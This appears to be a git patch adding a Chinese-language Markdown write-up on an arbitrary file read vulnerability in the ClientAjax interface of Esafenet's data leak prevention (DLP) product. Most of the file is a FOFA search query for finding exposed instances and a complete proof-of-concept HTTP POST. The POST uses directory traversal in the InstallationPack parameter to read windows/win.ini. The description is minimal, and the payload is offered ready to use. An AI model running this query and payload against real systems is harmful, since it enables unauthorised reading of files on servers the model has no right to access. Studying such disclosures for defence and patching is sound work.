From 840075a99eb678902075b28674a5f7d3914ef03e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:02:46 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9A-=E6=95=B0?= =?UTF-8?q?=E6=8D=AE=E6=B3=84=E9=9C=B2=E9=98=B2=E6=8A=A4(DLP)ClientAjax?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md diff --git a/亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md b/亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md new file mode 100644 index 0000000..3222e74 --- /dev/null +++ b/亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md @@ -0,0 +1,23 @@ +## 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞 + +亿赛通-数据泄露防护是一款专门防止您的私人数据资产在分享、存储过程中,被他人非法窃取或使用的安全产品。亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞。 + + +## fofa +``` +body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"||body="/CDGServer3/index.jsp" +``` + +## poc +``` +POST /CDGServer3/ClientAjax HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: 127.0.0.1 +Content-Length: 102 +Content-Type: application/x-www-form-urlencoded + +command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp +```